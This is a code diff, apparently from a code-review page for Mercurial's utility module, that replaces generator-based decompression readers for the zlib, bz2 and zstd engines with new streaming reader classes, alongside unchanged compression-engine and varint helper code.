3036 3041 engines to allow new compression formats to be added easily, possibly from
3037 3042 extensions.
3038 3043
3039 3044 Compressors are registered against the global instance by calling its
3040 3045 ``register()`` method.
3041 3046 """
3042 3047 def __init__(self):
3043 3048 self._engines = {}
3044 3049 # Bundle spec human name to engine name.
3045 3050 self._bundlenames = {}
3046 3051 # Internal bundle identifier to engine name.
3047 3052 self._bundletypes = {}
3048 3053 # Revlog header to engine name.
3049 3054 self._revlogheaders = {}
3050 3055 # Wire proto identifier to engine name.
3051 3056 self._wiretypes = {}
3052 3057
3053 3058 def __getitem__(self, key):
3054 3059 return self._engines[key]
3055 3060
3056 3061 def __contains__(self, key):
3057 3062 return key in self._engines
3058 3063
3059 3064 def __iter__(self):
3060 3065 return iter(self._engines.keys())
3061 3066
3062 3067 def register(self, engine):
3063 3068 """Register a compression engine with the manager.
3064 3069
3065 3070 The argument must be a ``compressionengine`` instance.
3066 3071 """
3067 3072 if not isinstance(engine, compressionengine):
3068 3073 raise ValueError(_('argument must be a compressionengine'))
3069 3074
3070 3075 name = engine.name()
3071 3076
3072 3077 if name in self._engines:
3073 3078 raise error.Abort(_('compression engine %s already registered') %
3074 3079 name)
3075 3080
3076 3081 bundleinfo = engine.bundletype()
3077 3082 if bundleinfo:
3078 3083 bundlename, bundletype = bundleinfo
3079 3084
3080 3085 if bundlename in self._bundlenames:
3081 3086 raise error.Abort(_('bundle name %s already registered') %
3082 3087 bundlename)
3083 3088 if bundletype in self._bundletypes:
3084 3089 raise error.Abort(_('bundle type %s already registered by %s') %
3085 3090 (bundletype, self._bundletypes[bundletype]))
3086 3091
3087 3092 # No external facing name declared.
3088 3093 if bundlename:
3089 3094 self._bundlenames[bundlename] = name
3090 3095
3091 3096 self._bundletypes[bundletype] = name
3092 3097
3093 3098 wiresupport = engine.wireprotosupport()
3094 3099 if wiresupport:
3095 3100 wiretype = wiresupport.name
3096 3101 if wiretype in self._wiretypes:
3097 3102 raise error.Abort(_('wire protocol compression %s already '
3098 3103 'registered by %s') %
3099 3104 (wiretype, self._wiretypes[wiretype]))
3100 3105
3101 3106 self._wiretypes[wiretype] = name
3102 3107
3103 3108 revlogheader = engine.revlogheader()
3104 3109 if revlogheader and revlogheader in self._revlogheaders:
3105 3110 raise error.Abort(_('revlog header %s already registered by %s') %
3106 3111 (revlogheader, self._revlogheaders[revlogheader]))
3107 3112
3108 3113 if revlogheader:
3109 3114 self._revlogheaders[revlogheader] = name
3110 3115
3111 3116 self._engines[name] = engine
3112 3117
3113 3118 @property
3114 3119 def supportedbundlenames(self):
3115 3120 return set(self._bundlenames.keys())
3116 3121
3117 3122 @property
3118 3123 def supportedbundletypes(self):
3119 3124 return set(self._bundletypes.keys())
3120 3125
3121 3126 def forbundlename(self, bundlename):
3122 3127 """Obtain a compression engine registered to a bundle name.
3123 3128
3124 3129 Will raise KeyError if the bundle type isn't registered.
3125 3130
3126 3131 Will abort if the engine is known but not available.
3127 3132 """
3128 3133 engine = self._engines[self._bundlenames[bundlename]]
3129 3134 if not engine.available():
3130 3135 raise error.Abort(_('compression engine %s could not be loaded') %
3131 3136 engine.name())
3132 3137 return engine
3133 3138
3134 3139 def forbundletype(self, bundletype):
3135 3140 """Obtain a compression engine registered to a bundle type.
3136 3141
3137 3142 Will raise KeyError if the bundle type isn't registered.
3138 3143
3139 3144 Will abort if the engine is known but not available.
3140 3145 """
3141 3146 engine = self._engines[self._bundletypes[bundletype]]
3142 3147 if not engine.available():
3143 3148 raise error.Abort(_('compression engine %s could not be loaded') %
3144 3149 engine.name())
3145 3150 return engine
3146 3151
3147 3152 def supportedwireengines(self, role, onlyavailable=True):
3148 3153 """Obtain compression engines that support the wire protocol.
3149 3154
3150 3155 Returns a list of engines in prioritized order, most desired first.
3151 3156
3152 3157 If ``onlyavailable`` is set, filter out engines that can't be
3153 3158 loaded.
3154 3159 """
3155 3160 assert role in (SERVERROLE, CLIENTROLE)
3156 3161
3157 3162 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3158 3163
3159 3164 engines = [self._engines[e] for e in self._wiretypes.values()]
3160 3165 if onlyavailable:
3161 3166 engines = [e for e in engines if e.available()]
3162 3167
3163 3168 def getkey(e):
3164 3169 # Sort first by priority, highest first. In case of tie, sort
3165 3170 # alphabetically. This is arbitrary, but ensures output is
3166 3171 # stable.
3167 3172 w = e.wireprotosupport()
3168 3173 return -1 * getattr(w, attr), w.name
3169 3174
3170 3175 return list(sorted(engines, key=getkey))
3171 3176
3172 3177 def forwiretype(self, wiretype):
3173 3178 engine = self._engines[self._wiretypes[wiretype]]
3174 3179 if not engine.available():
3175 3180 raise error.Abort(_('compression engine %s could not be loaded') %
3176 3181 engine.name())
3177 3182 return engine
3178 3183
3179 3184 def forrevlogheader(self, header):
3180 3185 """Obtain a compression engine registered to a revlog header.
3181 3186
3182 3187 Will raise KeyError if the revlog header value isn't registered.
3183 3188 """
3184 3189 return self._engines[self._revlogheaders[header]]
3185 3190
3186 3191 compengines = compressormanager()
3187 3192
3188 3193 class compressionengine(object):
3189 3194 """Base class for compression engines.
3190 3195
3191 3196 Compression engines must implement the interface defined by this class.
3192 3197 """
3193 3198 def name(self):
3194 3199 """Returns the name of the compression engine.
3195 3200
3196 3201 This is the key the engine is registered under.
3197 3202
3198 3203 This method must be implemented.
3199 3204 """
3200 3205 raise NotImplementedError()
3201 3206
3202 3207 def available(self):
3203 3208 """Whether the compression engine is available.
3204 3209
3205 3210 The intent of this method is to allow optional compression engines
3206 3211 that may not be available in all installations (such as engines relying
3207 3212 on C extensions that may not be present).
3208 3213 """
3209 3214 return True
3210 3215
3211 3216 def bundletype(self):
3212 3217 """Describes bundle identifiers for this engine.
3213 3218
3214 3219 If this compression engine isn't supported for bundles, returns None.
3215 3220
3216 3221 If this engine can be used for bundles, returns a 2-tuple of strings of
3217 3222 the user-facing "bundle spec" compression name and an internal
3218 3223 identifier used to denote the compression format within bundles. To
3219 3224 exclude the name from external usage, set the first element to ``None``.
3220 3225
3221 3226 If bundle compression is supported, the class must also implement
3222 3227 ``compressstream`` and `decompressorreader``.
3223 3228
3224 3229 The docstring of this method is used in the help system to tell users
3225 3230 about this engine.
3226 3231 """
3227 3232 return None
3228 3233
3229 3234 def wireprotosupport(self):
3230 3235 """Declare support for this compression format on the wire protocol.
3231 3236
3232 3237 If this compression engine isn't supported for compressing wire
3233 3238 protocol payloads, returns None.
3234 3239
3235 3240 Otherwise, returns ``compenginewireprotosupport`` with the following
3236 3241 fields:
3237 3242
3238 3243 * String format identifier
3239 3244 * Integer priority for the server
3240 3245 * Integer priority for the client
3241 3246
3242 3247 The integer priorities are used to order the advertisement of format
3243 3248 support by server and client. The highest integer is advertised
3244 3249 first. Integers with non-positive values aren't advertised.
3245 3250
3246 3251 The priority values are somewhat arbitrary and only used for default
3247 3252 ordering. The relative order can be changed via config options.
3248 3253
3249 3254 If wire protocol compression is supported, the class must also implement
3250 3255 ``compressstream`` and ``decompressorreader``.
3251 3256 """
3252 3257 return None
3253 3258
3254 3259 def revlogheader(self):
3255 3260 """Header added to revlog chunks that identifies this engine.
3256 3261
3257 3262 If this engine can be used to compress revlogs, this method should
3258 3263 return the bytes used to identify chunks compressed with this engine.
3259 3264 Else, the method should return ``None`` to indicate it does not
3260 3265 participate in revlog compression.
3261 3266 """
3262 3267 return None
3263 3268
3264 3269 def compressstream(self, it, opts=None):
3265 3270 """Compress an iterator of chunks.
3266 3271
3267 3272 The method receives an iterator (ideally a generator) of chunks of
3268 3273 bytes to be compressed. It returns an iterator (ideally a generator)
3269 3274 of bytes of chunks representing the compressed output.
3270 3275
3271 3276 Optionally accepts an argument defining how to perform compression.
3272 3277 Each engine treats this argument differently.
3273 3278 """
3274 3279 raise NotImplementedError()
3275 3280
3276 3281 def decompressorreader(self, fh):
3277 3282 """Perform decompression on a file object.
3278 3283
3279 3284 Argument is an object with a ``read(size)`` method that returns
3280 3285 compressed data. Return value is an object with a ``read(size)`` that
3281 3286 returns uncompressed data.
3282 3287 """
3283 3288 raise NotImplementedError()
3284 3289
3285 3290 def revlogcompressor(self, opts=None):
3286 3291 """Obtain an object that can be used to compress revlog entries.
3287 3292
3288 3293 The object has a ``compress(data)`` method that compresses binary
3289 3294 data. This method returns compressed binary data or ``None`` if
3290 3295 the data could not be compressed (too small, not compressible, etc).
3291 3296 The returned data should have a header uniquely identifying this
3292 3297 compression format so decompression can be routed to this engine.
3293 3298 This header should be identified by the ``revlogheader()`` return
3294 3299 value.
3295 3300
3296 3301 The object has a ``decompress(data)`` method that decompresses
3297 3302 data. The method will only be called if ``data`` begins with
3298 3303 ``revlogheader()``. The method should return the raw, uncompressed
3299 3304 data or raise a ``RevlogError``.
3300 3305
3301 3306 The object is reusable but is not thread safe.
3302 3307 """
3303 3308 raise NotImplementedError()
3304 3309
3310 class _CompressedStreamReader(object):
3311 def __init__(self, fh):
3312 if safehasattr(fh, 'unbufferedread'):
3313 self._reader = fh.unbufferedread
3314 else:
3315 self._reader = fh.read
3316 self._pending = []
3317 self._pos = 0
3318 self._eof = False
3319
3320 def _decompress(self, chunk):
3321 raise NotImplementedError()
3322
3323 def read(self, l):
3324 buf = []
3325 while True:
3326 while self._pending:
3327 if len(self._pending[0]) > l + self._pos:
3328 newbuf = self._pending[0]
3329 buf.append(newbuf[self._pos:self._pos + l])
3330 self._pos += l
3331 return ''.join(buf)
3332
3333 newbuf = self._pending.pop(0)
3334 if self._pos:
3335 buf.append(newbuf[self._pos:])
3336 l -= len(newbuf) - self._pos
3337 else:
3338 buf.append(newbuf)
3339 l -= len(newbuf)
3340 self._pos = 0
3341
3342 if self._eof:
3343 return ''.join(buf)
3344 chunk = self._reader(65536)
3345 self._decompress(chunk)
3346
3347 class _GzipCompressedStreamReader(_CompressedStreamReader):
3348 def __init__(self, fh):
3349 super(_GzipCompressedStreamReader, self).__init__(fh)
3350 self._decompobj = zlib.decompressobj()
3351 def _decompress(self, chunk):
3352 newbuf = self._decompobj.decompress(chunk)
3353 if newbuf:
3354 self._pending.append(newbuf)
3355 d = self._decompobj.copy()
3356 try:
3357 d.decompress('x')
3358 d.flush()
3359 if d.unused_data == 'x':
3360 self._eof = True
3361 except zlib.error:
3362 pass
3363
3364 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3365 def __init__(self, fh):
3366 super(_BZ2CompressedStreamReader, self).__init__(fh)
3367 self._decompobj = bz2.BZ2Decompressor()
3368 def _decompress(self, chunk):
3369 newbuf = self._decompobj.decompress(chunk)
3370 if newbuf:
3371 self._pending.append(newbuf)
3372 try:
3373 while True:
3374 newbuf = self._decompobj.decompress('')
3375 if newbuf:
3376 self._pending.append(newbuf)
3377 else:
3378 break
3379 except EOFError:
3380 self._eof = True
3381
3382 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3383 def __init__(self, fh):
3384 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3385 newbuf = self._decompobj.decompress('BZ')
3386 if newbuf:
3387 self._pending.append(newbuf)
3388
3389 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3390 def __init__(self, fh, zstd):
3391 super(_ZstdCompressedStreamReader, self).__init__(fh)
3392 self._zstd = zstd
3393 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3394 def _decompress(self, chunk):
3395 newbuf = self._decompobj.decompress(chunk)
3396 if newbuf:
3397 self._pending.append(newbuf)
3398 try:
3399 while True:
3400 newbuf = self._decompobj.decompress('')
3401 if newbuf:
3402 self._pending.append(newbuf)
3403 else:
3404 break
3405 except self._zstd.ZstdError:
3406 self._eof = True
3407
3305 3408 class _zlibengine(compressionengine):
3306 3409 def name(self):
3307 3410 return 'zlib'
3308 3411
3309 3412 def bundletype(self):
3310 3413 """zlib compression using the DEFLATE algorithm.
3311 3414
3312 3415 All Mercurial clients should support this format. The compression
3313 3416 algorithm strikes a reasonable balance between compression ratio
3314 3417 and size.
3315 3418 """
3316 3419 return 'gzip', 'GZ'
3317 3420
3318 3421 def wireprotosupport(self):
3319 3422 return compewireprotosupport('zlib', 20, 20)
3320 3423
3321 3424 def revlogheader(self):
3322 3425 return 'x'
3323 3426
3324 3427 def compressstream(self, it, opts=None):
3325 3428 opts = opts or {}
3326 3429
3327 3430 z = zlib.compressobj(opts.get('level', -1))
3328 3431 for chunk in it:
3329 3432 data = z.compress(chunk)
3330 3433 # Not all calls to compress emit data. It is cheaper to inspect
3331 3434 # here than to feed empty chunks through generator.
3332 3435 if data:
3333 3436 yield data
3334 3437
3335 3438 yield z.flush()
3336 3439
3337 3440 def decompressorreader(self, fh):
3338 def gen():
3339 d = zlib.decompressobj()
3340 for chunk in filechunkiter(fh):
3341 while chunk:
3342 # Limit output size to limit memory.
3343 yield d.decompress(chunk, 2 ** 18)
3344 chunk = d.unconsumed_tail
3345
3346 return chunkbuffer(gen())
3441 return _GzipCompressedStreamReader(fh)
3347 3442
3348 3443 class zlibrevlogcompressor(object):
3349 3444 def compress(self, data):
3350 3445 insize = len(data)
3351 3446 # Caller handles empty input case.
3352 3447 assert insize > 0
3353 3448
3354 3449 if insize < 44:
3355 3450 return None
3356 3451
3357 3452 elif insize <= 1000000:
3358 3453 compressed = zlib.compress(data)
3359 3454 if len(compressed) < insize:
3360 3455 return compressed
3361 3456 return None
3362 3457
3363 3458 # zlib makes an internal copy of the input buffer, doubling
3364 3459 # memory usage for large inputs. So do streaming compression
3365 3460 # on large inputs.
3366 3461 else:
3367 3462 z = zlib.compressobj()
3368 3463 parts = []
3369 3464 pos = 0
3370 3465 while pos < insize:
3371 3466 pos2 = pos + 2**20
3372 3467 parts.append(z.compress(data[pos:pos2]))
3373 3468 pos = pos2
3374 3469 parts.append(z.flush())
3375 3470
3376 3471 if sum(map(len, parts)) < insize:
3377 3472 return ''.join(parts)
3378 3473 return None
3379 3474
3380 3475 def decompress(self, data):
3381 3476 try:
3382 3477 return zlib.decompress(data)
3383 3478 except zlib.error as e:
3384 3479 raise error.RevlogError(_('revlog decompress error: %s') %
3385 3480 stringutil.forcebytestr(e))
3386 3481
3387 3482 def revlogcompressor(self, opts=None):
3388 3483 return self.zlibrevlogcompressor()
3389 3484
3390 3485 compengines.register(_zlibengine())
3391 3486
3392 3487 class _bz2engine(compressionengine):
3393 3488 def name(self):
3394 3489 return 'bz2'
3395 3490
3396 3491 def bundletype(self):
3397 3492 """An algorithm that produces smaller bundles than ``gzip``.
3398 3493
3399 3494 All Mercurial clients should support this format.
3400 3495
3401 3496 This engine will likely produce smaller bundles than ``gzip`` but
3402 3497 will be significantly slower, both during compression and
3403 3498 decompression.
3404 3499
3405 3500 If available, the ``zstd`` engine can yield similar or better
3406 3501 compression at much higher speeds.
3407 3502 """
3408 3503 return 'bzip2', 'BZ'
3409 3504
3410 3505 # We declare a protocol name but don't advertise by default because
3411 3506 # it is slow.
3412 3507 def wireprotosupport(self):
3413 3508 return compewireprotosupport('bzip2', 0, 0)
3414 3509
3415 3510 def compressstream(self, it, opts=None):
3416 3511 opts = opts or {}
3417 3512 z = bz2.BZ2Compressor(opts.get('level', 9))
3418 3513 for chunk in it:
3419 3514 data = z.compress(chunk)
3420 3515 if data:
3421 3516 yield data
3422 3517
3423 3518 yield z.flush()
3424 3519
3425 3520 def decompressorreader(self, fh):
3426 def gen():
3427 d = bz2.BZ2Decompressor()
3428 for chunk in filechunkiter(fh):
3429 yield d.decompress(chunk)
3430
3431 return chunkbuffer(gen())
3521 return _BZ2CompressedStreamReader(fh)
3432 3522
3433 3523 compengines.register(_bz2engine())
3434 3524
3435 3525 class _truncatedbz2engine(compressionengine):
3436 3526 def name(self):
3437 3527 return 'bz2truncated'
3438 3528
3439 3529 def bundletype(self):
3440 3530 return None, '_truncatedBZ'
3441 3531
3442 3532 # We don't implement compressstream because it is hackily handled elsewhere.
3443 3533
3444 3534 def decompressorreader(self, fh):
3445 def gen():
3446 # The input stream doesn't have the 'BZ' header. So add it back.
3447 d = bz2.BZ2Decompressor()
3448 d.decompress('BZ')
3449 for chunk in filechunkiter(fh):
3450 yield d.decompress(chunk)
3451
3452 return chunkbuffer(gen())
3535 return _TruncatedBZ2CompressedStreamReader(fh)
3453 3536
3454 3537 compengines.register(_truncatedbz2engine())
3455 3538
3456 3539 class _noopengine(compressionengine):
3457 3540 def name(self):
3458 3541 return 'none'
3459 3542
3460 3543 def bundletype(self):
3461 3544 """No compression is performed.
3462 3545
3463 3546 Use this compression engine to explicitly disable compression.
3464 3547 """
3465 3548 return 'none', 'UN'
3466 3549
3467 3550 # Clients always support uncompressed payloads. Servers don't because
3468 3551 # unless you are on a fast network, uncompressed payloads can easily
3469 3552 # saturate your network pipe.
3470 3553 def wireprotosupport(self):
3471 3554 return compewireprotosupport('none', 0, 10)
3472 3555
3473 3556 # We don't implement revlogheader because it is handled specially
3474 3557 # in the revlog class.
3475 3558
3476 3559 def compressstream(self, it, opts=None):
3477 3560 return it
3478 3561
3479 3562 def decompressorreader(self, fh):
3480 3563 return fh
3481 3564
3482 3565 class nooprevlogcompressor(object):
3483 3566 def compress(self, data):
3484 3567 return None
3485 3568
3486 3569 def revlogcompressor(self, opts=None):
3487 3570 return self.nooprevlogcompressor()
3488 3571
3489 3572 compengines.register(_noopengine())
3490 3573
3491 3574 class _zstdengine(compressionengine):
3492 3575 def name(self):
3493 3576 return 'zstd'
3494 3577
3495 3578 @propertycache
3496 3579 def _module(self):
3497 3580 # Not all installs have the zstd module available. So defer importing
3498 3581 # until first access.
3499 3582 try:
3500 3583 from . import zstd
3501 3584 # Force delayed import.
3502 3585 zstd.__version__
3503 3586 return zstd
3504 3587 except ImportError:
3505 3588 return None
3506 3589
3507 3590 def available(self):
3508 3591 return bool(self._module)
3509 3592
3510 3593 def bundletype(self):
3511 3594 """A modern compression algorithm that is fast and highly flexible.
3512 3595
3513 3596 Only supported by Mercurial 4.1 and newer clients.
3514 3597
3515 3598 With the default settings, zstd compression is both faster and yields
3516 3599 better compression than ``gzip``. It also frequently yields better
3517 3600 compression than ``bzip2`` while operating at much higher speeds.
3518 3601
3519 3602 If this engine is available and backwards compatibility is not a
3520 3603 concern, it is likely the best available engine.
3521 3604 """
3522 3605 return 'zstd', 'ZS'
3523 3606
3524 3607 def wireprotosupport(self):
3525 3608 return compewireprotosupport('zstd', 50, 50)
3526 3609
3527 3610 def revlogheader(self):
3528 3611 return '\x28'
3529 3612
3530 3613 def compressstream(self, it, opts=None):
3531 3614 opts = opts or {}
3532 3615 # zstd level 3 is almost always significantly faster than zlib
3533 3616 # while providing no worse compression. It strikes a good balance
3534 3617 # between speed and compression.
3535 3618 level = opts.get('level', 3)
3536 3619
3537 3620 zstd = self._module
3538 3621 z = zstd.ZstdCompressor(level=level).compressobj()
3539 3622 for chunk in it:
3540 3623 data = z.compress(chunk)
3541 3624 if data:
3542 3625 yield data
3543 3626
3544 3627 yield z.flush()
3545 3628
3546 3629 def decompressorreader(self, fh):
3547 zstd = self._module
3548 dctx = zstd.ZstdDecompressor()
3549 return chunkbuffer(dctx.read_from(fh))
3630 return _ZstdCompressedStreamReader(fh, self._module)
3550 3631
3551 3632 class zstdrevlogcompressor(object):
3552 3633 def __init__(self, zstd, level=3):
3553 3634 # TODO consider omitting frame magic to save 4 bytes.
3554 3635 # This writes content sizes into the frame header. That is
3555 3636 # extra storage. But it allows a correct size memory allocation
3556 3637 # to hold the result.
3557 3638 self._cctx = zstd.ZstdCompressor(level=level)
3558 3639 self._dctx = zstd.ZstdDecompressor()
3559 3640 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3560 3641 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3561 3642
3562 3643 def compress(self, data):
3563 3644 insize = len(data)
3564 3645 # Caller handles empty input case.
3565 3646 assert insize > 0
3566 3647
3567 3648 if insize < 50:
3568 3649 return None
3569 3650
3570 3651 elif insize <= 1000000:
3571 3652 compressed = self._cctx.compress(data)
3572 3653 if len(compressed) < insize:
3573 3654 return compressed
3574 3655 return None
3575 3656 else:
3576 3657 z = self._cctx.compressobj()
3577 3658 chunks = []
3578 3659 pos = 0
3579 3660 while pos < insize:
3580 3661 pos2 = pos + self._compinsize
3581 3662 chunk = z.compress(data[pos:pos2])
3582 3663 if chunk:
3583 3664 chunks.append(chunk)
3584 3665 pos = pos2
3585 3666 chunks.append(z.flush())
3586 3667
3587 3668 if sum(map(len, chunks)) < insize:
3588 3669 return ''.join(chunks)
3589 3670 return None
3590 3671
3591 3672 def decompress(self, data):
3592 3673 insize = len(data)
3593 3674
3594 3675 try:
3595 3676 # This was measured to be faster than other streaming
3596 3677 # decompressors.
3597 3678 dobj = self._dctx.decompressobj()
3598 3679 chunks = []
3599 3680 pos = 0
3600 3681 while pos < insize:
3601 3682 pos2 = pos + self._decompinsize
3602 3683 chunk = dobj.decompress(data[pos:pos2])
3603 3684 if chunk:
3604 3685 chunks.append(chunk)
3605 3686 pos = pos2
3606 3687 # Frame should be exhausted, so no finish() API.
3607 3688
3608 3689 return ''.join(chunks)
3609 3690 except Exception as e:
3610 3691 raise error.RevlogError(_('revlog decompress error: %s') %
3611 3692 stringutil.forcebytestr(e))
3612 3693
3613 3694 def revlogcompressor(self, opts=None):
3614 3695 opts = opts or {}
3615 3696 return self.zstdrevlogcompressor(self._module,
3616 3697 level=opts.get('level', 3))
3617 3698
3618 3699 compengines.register(_zstdengine())
3619 3700
3620 3701 def bundlecompressiontopics():
3621 3702 """Obtains a list of available bundle compressions for use in help."""
3622 3703 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3623 3704 items = {}
3624 3705
3625 3706 # We need to format the docstring. So use a dummy object/type to hold it
3626 3707 # rather than mutating the original.
3627 3708 class docobject(object):
3628 3709 pass
3629 3710
3630 3711 for name in compengines:
3631 3712 engine = compengines[name]
3632 3713
3633 3714 if not engine.available():
3634 3715 continue
3635 3716
3636 3717 bt = engine.bundletype()
3637 3718 if not bt or not bt[0]:
3638 3719 continue
3639 3720
3640 3721 doc = pycompat.sysstr('``%s``\n %s') % (
3641 3722 bt[0], engine.bundletype.__doc__)
3642 3723
3643 3724 value = docobject()
3644 3725 value.__doc__ = doc
3645 3726 value._origdoc = engine.bundletype.__doc__
3646 3727 value._origfunc = engine.bundletype
3647 3728
3648 3729 items[bt[0]] = value
3649 3730
3650 3731 return items
3651 3732
3652 3733 i18nfunctions = bundlecompressiontopics().values()
3653 3734
3654 3735 # convenient shortcut
3655 3736 dst = debugstacktrace
3656 3737
3657 3738 def safename(f, tag, ctx, others=None):
3658 3739 """
3659 3740 Generate a name that it is safe to rename f to in the given context.
3660 3741
3661 3742 f: filename to rename
3662 3743 tag: a string tag that will be included in the new name
3663 3744 ctx: a context, in which the new name must not exist
3664 3745 others: a set of other filenames that the new name must not be in
3665 3746
3666 3747 Returns a file name of the form oldname~tag[~number] which does not exist
3667 3748 in the provided context and is not in the set of other names.
3668 3749 """
3669 3750 if others is None:
3670 3751 others = set()
3671 3752
3672 3753 fn = '%s~%s' % (f, tag)
3673 3754 if fn not in ctx and fn not in others:
3674 3755 return fn
3675 3756 for n in itertools.count(1):
3676 3757 fn = '%s~%s~%s' % (f, tag, n)
3677 3758 if fn not in ctx and fn not in others:
3678 3759 return fn
3679 3760
3680 3761 def readexactly(stream, n):
3681 3762 '''read n bytes from stream.read and abort if less was available'''
3682 3763 s = stream.read(n)
3683 3764 if len(s) < n:
3684 3765 raise error.Abort(_("stream ended unexpectedly"
3685 3766 " (got %d bytes, expected %d)")
3686 3767 % (len(s), n))
3687 3768 return s
3688 3769
3689 3770 def uvarintencode(value):
3690 3771 """Encode an unsigned integer value to a varint.
3691 3772
3692 3773 A varint is a variable length integer of 1 or more bytes. Each byte
3693 3774 except the last has the most significant bit set. The lower 7 bits of
3694 3775 each byte store the 2's complement representation, least significant group
3695 3776 first.
3696 3777
3697 3778 >>> uvarintencode(0)
3698 3779 '\\x00'
3699 3780 >>> uvarintencode(1)
3700 3781 '\\x01'
3701 3782 >>> uvarintencode(127)
3702 3783 '\\x7f'
3703 3784 >>> uvarintencode(1337)
3704 3785 '\\xb9\\n'
3705 3786 >>> uvarintencode(65536)
3706 3787 '\\x80\\x80\\x04'
3707 3788 >>> uvarintencode(-1)
3708 3789 Traceback (most recent call last):
3709 3790 ...
3710 3791 ProgrammingError: negative value for uvarint: -1
3711 3792 """
3712 3793 if value < 0:
3713 3794 raise error.ProgrammingError('negative value for uvarint: %d'
3714 3795 % value)
3715 3796 bits = value & 0x7f
3716 3797 value >>= 7
3717 3798 bytes = []
3718 3799 while value:
3719 3800 bytes.append(pycompat.bytechr(0x80 | bits))
3720 3801 bits = value & 0x7f
3721 3802 value >>= 7
3722 3803 bytes.append(pycompat.bytechr(bits))
3723 3804
3724 3805 return ''.join(bytes)
3725 3806
3726 3807 def uvarintdecodestream(fh):
3727 3808 """Decode an unsigned variable length integer from a stream.
3728 3809
3729 3810 The passed argument is anything that has a ``.read(N)`` method.
3730 3811
3731 3812 >>> try:
3732 3813 ... from StringIO import StringIO as BytesIO
3733 3814 ... except ImportError:
3734 3815 ... from io import BytesIO
3735 3816 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3736 3817 0
3737 3818 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3738 3819 1
3739 3820 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3740 3821 127
3741 3822 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3742 3823 1337
3743 3824 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3744 3825 65536
3745 3826 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3746 3827 Traceback (most recent call last):
3747 3828 ...
3748 3829 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3749 3830 """
3750 3831 result = 0
3751 3832 shift = 0
3752 3833 while True:
3753 3834 byte = ord(readexactly(fh, 1))
3754 3835 result |= ((byte & 0x7f) << shift)
3755 3836 if not (byte & 0x80):
3756 3837 return result
3757 3838 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now